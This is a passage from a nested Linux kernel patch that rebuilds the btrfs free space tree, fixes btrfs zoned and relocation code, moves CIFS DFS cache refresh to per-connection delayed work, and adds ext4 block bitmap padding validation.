++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ {
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_root *tree_root = fs_info->tree_root;
+@@ -1298,6 +1298,54 @@ abort:
+ 	return ret;
+ }
+ 
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info)
++{
++	struct btrfs_trans_handle *trans;
++	struct btrfs_key key = {
++		.objectid = BTRFS_FREE_SPACE_TREE_OBJECTID,
++		.type = BTRFS_ROOT_ITEM_KEY,
++		.offset = 0,
++	};
++	struct btrfs_root *free_space_root = btrfs_global_root(fs_info, &key);
++	struct rb_node *node;
++	int ret;
++
++	trans = btrfs_start_transaction(free_space_root, 1);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
++
++	set_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++	set_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++
++	ret = clear_free_space_tree(trans, free_space_root);
++	if (ret)
++		goto abort;
++
++	node = rb_first_cached(&fs_info->block_group_cache_tree);
++	while (node) {
++		struct btrfs_block_group *block_group;
++
++		block_group = rb_entry(node, struct btrfs_block_group,
++				       cache_node);
++		ret = populate_free_space_tree(trans, block_group);
++		if (ret)
++			goto abort;
++		node = rb_next(node);
++	}
++
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE);
++	btrfs_set_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID);
++	clear_bit(BTRFS_FS_CREATING_FREE_SPACE_TREE, &fs_info->flags);
++
++	ret = btrfs_commit_transaction(trans);
++	clear_bit(BTRFS_FS_FREE_SPACE_TREE_UNTRUSTED, &fs_info->flags);
++	return ret;
++abort:
++	btrfs_abort_transaction(trans, ret);
++	btrfs_end_transaction(trans);
++	return ret;
++}
++
+ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 					struct btrfs_block_group *block_group,
+ 					struct btrfs_path *path)
+diff --git a/fs/btrfs/free-space-tree.h b/fs/btrfs/free-space-tree.h
+index dc2463e4cfe3c..6d5551d0ced81 100644
+--- a/fs/btrfs/free-space-tree.h
++++ b/fs/btrfs/free-space-tree.h
+@@ -18,7 +18,8 @@ struct btrfs_caching_control;
+ 
+ void set_free_space_tree_thresholds(struct btrfs_block_group *block_group);
+ int btrfs_create_free_space_tree(struct btrfs_fs_info *fs_info);
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info);
++int btrfs_rebuild_free_space_tree(struct btrfs_fs_info *fs_info);
+ int load_free_space_tree(struct btrfs_caching_control *caching_ctl);
+ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_block_group *block_group);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 98a800b8bd438..21ed4e3dd6902 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3264,6 +3264,9 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 		btrfs_rewrite_logical_zoned(ordered_extent);
+ 		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes);
++	} else if (btrfs_is_data_reloc_root(inode->root)) {
++		btrfs_zone_finish_endio(fs_info, ordered_extent->disk_bytenr,
++					ordered_extent->disk_num_bytes);
+ 	}
+ 
+ 	btrfs_free_io_failure_record(inode, start, end);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index bff2d1fd3c812..8a045166a2654 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -454,7 +454,9 @@ void btrfs_exclop_balance(struct btrfs_fs_info *fs_info,
+ 	case BTRFS_EXCLOP_BALANCE_PAUSED:
+ 		spin_lock(&fs_info->super_lock);
+ 		ASSERT(fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE ||
+-		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD);
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_NONE ||
++		       fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED);
+ 		fs_info->exclusive_operation = BTRFS_EXCLOP_BALANCE_PAUSED;
+ 		spin_unlock(&fs_info->super_lock);
+ 		break;
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index b93c962133048..497b9dbd8a133 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -151,10 +151,10 @@ static void print_extent_item(struct extent_buffer *eb, int slot, int type)
+ 			pr_cont("shared data backref parent %llu count %u\n",
+ 			       offset, btrfs_shared_data_ref_count(eb, sref));
+ 			/*
+-			 * offset is supposed to be a tree block which
+-			 * must be aligned to nodesize.
++			 * Offset is supposed to be a tree block which must be
++			 * aligned to sectorsize.
+ 			 */
+-			if (!IS_ALIGNED(offset, eb->fs_info->nodesize))
++			if (!IS_ALIGNED(offset, eb->fs_info->sectorsize))
+ 				pr_info(
+ 			"\t\t\t(parent %llu not aligned to sectorsize %u)\n",
+ 				     offset, eb->fs_info->sectorsize);
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index 31ec4a7658ce6..4f96a4825795e 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -3422,7 +3422,7 @@ int add_data_references(struct reloc_control *rc,
+ 	btrfs_release_path(path);
+ 
+ 	ctx.bytenr = extent_key->objectid;
+-	ctx.ignore_extent_item_pos = true;
++	ctx.skip_inode_ref_list = true;
+ 	ctx.fs_info = rc->extent_root->fs_info;
+ 
+ 	ret = btrfs_find_all_leafs(&ctx);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 3f3c8f9186f90..21322be95c0d2 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -825,7 +825,11 @@ out:
+ 	    !btrfs_test_opt(info, CLEAR_CACHE)) {
+ 		btrfs_err(info, "cannot disable free space tree");
+ 		ret = -EINVAL;
+-
++	}
++	if (btrfs_fs_compat_ro(info, BLOCK_GROUP_TREE) &&
++	     !btrfs_test_opt(info, FREE_SPACE_TREE)) {
++		btrfs_err(info, "cannot disable free space tree with block-group-tree feature");
++		ret = -EINVAL;
+ 	}
+ 	if (!ret)
+ 		ret = btrfs_check_mountopts_zoned(info);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index ce5ebba7fdd9a..250c4755ec12d 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -121,10 +121,9 @@ static int sb_write_pointer(struct block_device *bdev, struct blk_zone *zones,
+ 		int i;
+ 
+ 		for (i = 0; i < BTRFS_NR_SB_LOG_ZONES; i++) {
+-			u64 bytenr;
+-
+-			bytenr = ((zones[i].start + zones[i].len)
+-				   << SECTOR_SHIFT) - BTRFS_SUPER_INFO_SIZE;
++			u64 zone_end = (zones[i].start + zones[i].capacity) << SECTOR_SHIFT;
++			u64 bytenr = ALIGN_DOWN(zone_end, BTRFS_SUPER_INFO_SIZE) -
++						BTRFS_SUPER_INFO_SIZE;
+ 
+ 			page[i] = read_cache_page_gfp(mapping,
+ 					bytenr >> PAGE_SHIFT, GFP_NOFS);
+@@ -1164,12 +1163,12 @@ int btrfs_ensure_empty_zones(struct btrfs_device *device, u64 start, u64 size)
+ 		return -ERANGE;
+ 
+ 	/* All the zones are conventional */
+-	if (find_next_bit(zinfo->seq_zones, begin, end) == end)
++	if (find_next_bit(zinfo->seq_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	/* All the zones are sequential and empty */
+-	if (find_next_zero_bit(zinfo->seq_zones, begin, end) == end &&
+-	    find_next_zero_bit(zinfo->empty_zones, begin, end) == end)
++	if (find_next_zero_bit(zinfo->seq_zones, end, begin) == end &&
++	    find_next_zero_bit(zinfo->empty_zones, end, begin) == end)
+ 		return 0;
+ 
+ 	for (pos = start; pos < start + size; pos += zinfo->zone_size) {
+@@ -1606,11 +1605,11 @@ void btrfs_redirty_list_add(struct btrfs_transaction *trans,
+ 	    !list_empty(&eb->release_list))
+ 		return;
+ 
++	memzero_extent_buffer(eb, 0, eb->len);
++	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 	set_extent_buffer_dirty(eb);
+ 	set_extent_bits_nowait(&trans->dirty_pages, eb->start,
+ 			       eb->start + eb->len - 1, EXTENT_DIRTY);
+-	memzero_extent_buffer(eb, 0, eb->len);
+-	set_bit(EXTENT_BUFFER_NO_CHECK, &eb->bflags);
+ 
+ 	spin_lock(&trans->releasing_ebs_lock);
+ 	list_add_tail(&eb->release_list, &trans->releasing_ebs);
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 8485d380cddf9..2b2dd769c3bc2 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -743,6 +743,7 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
++	cifs_close_all_deferred_files(tcon);
+ 	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+ 	/* cancel_notify_requests(tcon); */
+ 	if (tcon->ses && tcon->ses->server) {
+@@ -758,6 +759,20 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	return;
+ }
+ 
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
+ #ifdef CONFIG_CIFS_STATS2
+ static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+ {
+@@ -796,6 +811,7 @@ static const struct super_operations cifs_super_ops = {
+ 	as opens */
+ 	.show_options = cifs_show_options,
+ 	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
+ #ifdef CONFIG_CIFS_STATS2
+ 	.show_stats = cifs_show_stats,
+ #endif
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index ea216e9d0f944..e6d12a6563887 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -1244,8 +1244,8 @@ struct cifs_tcon {
+ 	struct cached_fids *cfids;
+ 	/* BB add field for back pointer to sb struct(s)? */
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct list_head ulist; /* cache update list */
+ 	struct list_head dfs_ses_list;
++	struct delayed_work dfs_cache_work;
+ #endif
+ 	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+ };
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 87527512c2660..33fa18280e922 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2386,6 +2386,9 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 
+ 	/* cancel polling of interfaces */
+ 	cancel_delayed_work_sync(&tcon->query_interfaces);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	cancel_delayed_work_sync(&tcon->dfs_cache_work);
++#endif
+ 
+ 	if (tcon->use_witness) {
+ 		int rc;
+@@ -2633,7 +2636,9 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+ 				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+ 	}
+-
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	INIT_DELAYED_WORK(&tcon->dfs_cache_work, dfs_cache_refresh);
++#endif
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_add(&tcon->tcon_list, &ses->tcon_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+@@ -2749,6 +2754,13 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
+ 	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+ 	if (tlink == NULL) {
+ 		/* can not match superblock if tlink were ever null */
+@@ -4119,9 +4131,13 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
++	if (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON) {
++		spin_unlock(&tcon->tc_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (tcon->status == TID_GOOD) {
+ 		spin_unlock(&tcon->tc_lock);
+ 		return 0;
+ 	}
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index 4c392bde24066..a93dbca1411b2 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -157,6 +157,8 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 		rc = cifs_is_path_remote(mnt_ctx);
+ 	}
+ 
++	dfs_cache_noreq_update_tgthint(ref_path + 1, tit);
++
+ 	if (rc == -EREMOTE && is_refsrv) {
+ 		rc2 = add_root_smb_session(mnt_ctx);
+ 		if (rc2)
+@@ -259,6 +261,8 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 		if (list_empty(&tcon->dfs_ses_list)) {
+ 			list_replace_init(&mnt_ctx->dfs_ses_list,
+ 					  &tcon->dfs_ses_list);
++			queue_delayed_work(dfscache_wq, &tcon->dfs_cache_work,
++					   dfs_cache_get_ttl() * HZ);
+ 		} else {
+ 			dfs_put_root_smb_sessions(&mnt_ctx->dfs_ses_list);
+ 		}
+@@ -571,9 +575,13 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
++	if (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON) {
++		spin_unlock(&tcon->tc_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (tcon->status == TID_GOOD) {
+ 		spin_unlock(&tcon->tc_lock);
+ 		return 0;
+ 	}
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 9ccaa0c7ac943..1513b2709889b 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -20,12 +20,14 @@
+ #include "cifs_unicode.h"
+ #include "smb2glob.h"
+ #include "dns_resolve.h"
++#include "dfs.h"
+ 
+ #include "dfs_cache.h"
+ 
+-#define CACHE_HTABLE_SIZE 32
+-#define CACHE_MAX_ENTRIES 64
+-#define CACHE_MIN_TTL 120 /* 2 minutes */
++#define CACHE_HTABLE_SIZE	32
++#define CACHE_MAX_ENTRIES	64
++#define CACHE_MIN_TTL		120 /* 2 minutes */
++#define CACHE_DEFAULT_TTL	300 /* 5 minutes */
+ 
+ #define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
+ 
+@@ -50,10 +52,9 @@ struct cache_entry {
+ };
+ 
+ static struct kmem_cache *cache_slab __read_mostly;
+-static struct workqueue_struct *dfscache_wq __read_mostly;
++struct workqueue_struct *dfscache_wq;
+ 
+-static int cache_ttl;
+-static DEFINE_SPINLOCK(cache_ttl_lock);
++atomic_t dfs_cache_ttl;
+ 
+ static struct nls_table *cache_cp;
+ 
+@@ -65,10 +66,6 @@ static atomic_t cache_count;
+ static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+ static DECLARE_RWSEM(htable_rw_lock);
+ 
+-static void refresh_cache_worker(struct work_struct *work);
+-
+-static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+-
+ /**
+  * dfs_cache_canonical_path - get a canonical DFS path
+  *
+@@ -290,7 +287,9 @@ int dfs_cache_init(void)
+ 	int rc;
+ 	int i;
+ 
+-	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
++	dfscache_wq = alloc_workqueue("cifs-dfscache",
++				      WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM,
++				      0);
+ 	if (!dfscache_wq)
+ 		return -ENOMEM;
+ 
+@@ -306,6 +305,7 @@ int dfs_cache_init(void)
+ 		INIT_HLIST_HEAD(&cache_htable[i]);
+ 
+ 	atomic_set(&cache_count, 0);
++	atomic_set(&dfs_cache_ttl, CACHE_DEFAULT_TTL);
+ 	cache_cp = load_nls("utf8");
+ 	if (!cache_cp)
+ 		cache_cp = load_nls_default();
+@@ -480,6 +480,7 @@ static struct cache_entry *add_cache_entry_locked(struct dfs_info3_param *refs,
+ 	int rc;
+ 	struct cache_entry *ce;
+ 	unsigned int hash;
++	int ttl;
+ 
+ 	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+ 
+@@ -496,15 +497,8 @@ static struct cache_entry *add_cache_entry_locked(struct dfs_info3_param *refs,
+ 	if (IS_ERR(ce))
+ 		return ce;
+ 
+-	spin_lock(&cache_ttl_lock);
+-	if (!cache_ttl) {
+-		cache_ttl = ce->ttl;
+-		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	} else {
+-		cache_ttl = min_t(int, cache_ttl, ce->ttl);
+-		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	}
+-	spin_unlock(&cache_ttl_lock);
++	ttl = min_t(int, atomic_read(&dfs_cache_ttl), ce->ttl);
++	atomic_set(&dfs_cache_ttl, ttl);
+ 
+ 	hlist_add_head(&ce->hlist, &cache_htable[hash]);
+ 	dump_ce(ce);
+@@ -616,7 +610,6 @@ static struct cache_entry *lookup_cache_entry(const char *path)
+  */
+ void dfs_cache_destroy(void)
+ {
+-	cancel_delayed_work_sync(&refresh_task);
+ 	unload_nls(cache_cp);
+ 	flush_cache_ents();
+ 	kmem_cache_destroy(cache_slab);
+@@ -1142,6 +1135,7 @@ static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, c
+  * target shares in @refs.
+  */
+ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
++					 const char *path,
+ 					 struct dfs_cache_tgt_list *old_tl,
+ 					 struct dfs_cache_tgt_list *new_tl)
+ {
+@@ -1153,8 +1147,10 @@ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
+ 		     nit = dfs_cache_get_next_tgt(new_tl, nit)) {
+ 			if (target_share_equal(server,
+ 					       dfs_cache_get_tgt_name(oit),
+-					       dfs_cache_get_tgt_name(nit)))
++					       dfs_cache_get_tgt_name(nit))) {
++				dfs_cache_noreq_update_tgthint(path, nit);
+ 				return;
++			}
+ 		}
+ 	}
+ 
+@@ -1162,13 +1158,28 @@ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
+ 	cifs_signal_cifsd_for_reconnect(server, true);
+ }
+ 
++static bool is_ses_good(struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++	bool ret;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	ret = !cifs_chan_needs_reconnect(ses, server) &&
++		ses->ses_status == SES_GOOD &&
++		!tcon->need_reconnect;
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++	return ret;
++}
++
+ /* Refresh dfs referral of tcon and mark it for reconnect if needed */
+-static int __refresh_tcon(const char *path, struct cifs_tcon *tcon, bool force_refresh)
++static int __refresh_tcon(const char *path, struct cifs_ses *ses, bool force_refresh)
+ {
+ 	struct dfs_cache_tgt_list old_tl = DFS_CACHE_TGT_LIST_INIT(old_tl);
+ 	struct dfs_cache_tgt_list new_tl = DFS_CACHE_TGT_LIST_INIT(new_tl);
+-	struct cifs_ses *ses = CIFS_DFS_ROOT_SES(tcon->ses);
+-	struct cifs_tcon *ipc = ses->tcon_ipc;
++	struct TCP_Server_Info *server = ses->server;
+ 	bool needs_refresh = false;
+ 	struct cache_entry *ce;
+ 	unsigned int xid;
+@@ -1190,20 +1201,19 @@ static int __refresh_tcon(const char *path, struct cifs_tcon *tcon, bool force_r
+ 		goto out;
+ 	}
+ 
+-	spin_lock(&ipc->tc_lock);
+-	if (ses->ses_status != SES_GOOD || ipc->status != TID_GOOD) {
+-		spin_unlock(&ipc->tc_lock);
+-		cifs_dbg(FYI, "%s: skip cache refresh due to disconnected ipc\n", __func__);
++	ses = CIFS_DFS_ROOT_SES(ses);
++	if (!is_ses_good(ses)) {
++		cifs_dbg(FYI, "%s: skip cache refresh due to disconnected ipc\n",
++			 __func__);
+ 		goto out;
+ 	}
+-	spin_unlock(&ipc->tc_lock);
+ 
+ 	ce = cache_refresh_path(xid, ses, path, true);
+ 	if (!IS_ERR(ce)) {
+ 		rc = get_targets(ce, &new_tl);
+ 		up_read(&htable_rw_lock);
+ 		cifs_dbg(FYI, "%s: get_targets: %d\n", __func__, rc);
+-		mark_for_reconnect_if_needed(tcon->ses->server, &old_tl, &new_tl);
++		mark_for_reconnect_if_needed(server, path, &old_tl, &new_tl);
+ 	}
+ 
+ out:
+@@ -1216,10 +1226,11 @@ out:
+ static int refresh_tcon(struct cifs_tcon *tcon, bool force_refresh)
+ {
+ 	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_ses *ses = tcon->ses;
+ 
+ 	mutex_lock(&server->refpath_lock);
+ 	if (server->leaf_fullpath)
+-		__refresh_tcon(server->leaf_fullpath + 1, tcon, force_refresh);
++		__refresh_tcon(server->leaf_fullpath + 1, ses, force_refresh);
+ 	mutex_unlock(&server->refpath_lock);
+ 	return 0;
+ }
+@@ -1263,60 +1274,32 @@ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+ 	return refresh_tcon(tcon, true);
+ }
+ 
+-/*
+- * Worker that will refresh DFS cache from all active mounts based on lowest TTL value
+- * from a DFS referral.
+- */
+-static void refresh_cache_worker(struct work_struct *work)
++/* Refresh all DFS referrals related to DFS tcon */
++void dfs_cache_refresh(struct work_struct *work)
+ {
+ 	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon, *ntcon;
+-	struct list_head tcons;
++	struct dfs_root_ses *rses;
++	struct cifs_tcon *tcon;
+ 	struct cifs_ses *ses;
+ 
+-	INIT_LIST_HEAD(&tcons);
++	tcon = container_of(work, struct cifs_tcon, dfs_cache_work.work);
++	ses = tcon->ses;
++	server = ses->server;
+ 
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-		if (!server->leaf_fullpath) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			if (ses->tcon_ipc) {
+-				ses->ses_count++;
+-				list_add_tail(&ses->tcon_ipc->ulist, &tcons);
+-			}
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				if (!tcon->ipc) {
+-					tcon->tc_count++;
+-					list_add_tail(&tcon->ulist, &tcons);
+-				}
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-
+-		list_del_init(&tcon->ulist);
++	mutex_lock(&server->refpath_lock);
++	if (server->leaf_fullpath)
++		__refresh_tcon(server->leaf_fullpath + 1, ses, false);
++	mutex_unlock(&server->refpath_lock);
+ 
++	list_for_each_entry(rses, &tcon->dfs_ses_list, list) {
++		ses = rses->ses;
++		server = ses->server;
+ 		mutex_lock(&server->refpath_lock);
+ 		if (server->leaf_fullpath)
+-			__refresh_tcon(server->leaf_fullpath + 1, tcon, false);
++			__refresh_tcon(server->leaf_fullpath + 1, ses, false);
+ 		mutex_unlock(&server->refpath_lock);
+-
+-		if (tcon->ipc)
+-			cifs_put_smb_ses(tcon->ses);
+-		else
+-			cifs_put_tcon(tcon);
+ 	}
+ 
+-	spin_lock(&cache_ttl_lock);
+-	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	spin_unlock(&cache_ttl_lock);
++	queue_delayed_work(dfscache_wq, &tcon->dfs_cache_work,
++			   atomic_read(&dfs_cache_ttl) * HZ);
+ }
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+index e0d39393035a9..c6d89cd6d4fd7 100644
+--- a/fs/cifs/dfs_cache.h
++++ b/fs/cifs/dfs_cache.h
+@@ -13,6 +13,9 @@
+ #include <linux/uuid.h>
+ #include "cifsglob.h"
+ 
++extern struct workqueue_struct *dfscache_wq;
++extern atomic_t dfs_cache_ttl;
++
+ #define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
+ 
+ struct dfs_cache_tgt_list {
+@@ -42,6 +45,7 @@ int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it,
+ 			    char **prefix);
+ char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
++void dfs_cache_refresh(struct work_struct *work);
+ 
+ static inline struct dfs_cache_tgt_iterator *
+ dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
+@@ -89,4 +93,9 @@ dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
+ 	return tl ? tl->tl_numtgts : 0;
+ }
+ 
++static inline int dfs_cache_get_ttl(void)
++{
++	return atomic_read(&dfs_cache_ttl);
++}
++
+ #endif /* _CIFS_DFS_CACHE_H */
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index bef7c335ccc6e..d037366fcc5ee 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -48,13 +48,13 @@ cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+ 	struct list_head *tmp1;
+ 
+ 	/* only send once per connect */
+-	spin_lock(&tcon->ses->ses_lock);
+-	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
+-		spin_unlock(&tcon->ses->ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status != TID_NEED_RECON) {
++		spin_unlock(&tcon->tc_lock);
+ 		return;
+ 	}
+ 	tcon->status = TID_IN_FILES_INVALIDATE;
+-	spin_unlock(&tcon->ses->ses_lock);
++	spin_unlock(&tcon->tc_lock);
+ 
+ 	/* list all files open on tree connection and mark them invalid */
+ 	spin_lock(&tcon->open_file_lock);
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 502b6915ccc41..d6d6d04fbcbe2 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -1682,7 +1682,7 @@ smb2_copychunk_range(const unsigned int xid,
+ 		pcchunk->SourceOffset = cpu_to_le64(src_off);
+ 		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+ 		pcchunk->Length =
+-			cpu_to_le32(min_t(u32, len, tcon->max_bytes_chunk));
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+ 
+ 		/* Request server copy to target from src identified by key */
+ 		kfree(retbuf);
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8ff4b9192a9f5..f2c415f31b755 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -303,6 +303,22 @@ struct ext4_group_desc * ext4_get_group_desc(struct super_block *sb,
+ 	return desc;
+ }
+ 
++static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
++						    ext4_group_t block_group,
++						    struct buffer_head *bh)
++{
++	ext4_grpblk_t next_zero_bit;
++	unsigned long bitmap_size = sb->s_blocksize * 8;
++	unsigned int offset = num_clusters_in_group(sb, block_group);
++
++	if (bitmap_size <= offset)
++		return 0;
++
++	next_zero_bit = ext4_find_next_zero_bit(bh->b_data, bitmap_size, offset);
++
++	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -401,6 +417,15 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 					EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+ 		return -EFSCORRUPTED;
+ 	}
++	blk = ext4_valid_block_bitmap_padding(sb, block_group, bh);
++	if (unlikely(blk != 0)) {
++		ext4_unlock_group(sb, block_group);
++		ext4_error(sb, "bg %u: block %llu: padding at end of block bitmap is not set",
++			   block_group, blk);
++		ext4_mark_group_bitmap_corrupted(sb, block_group,
++						 EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		return -EFSCORRUPTED;
++	}
+ 	set_buffer_verified(bh);
+ verified:
+ 	ext4_unlock_group(sb, block_group);
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 6479146140d20..a3f0c79568a64 100644
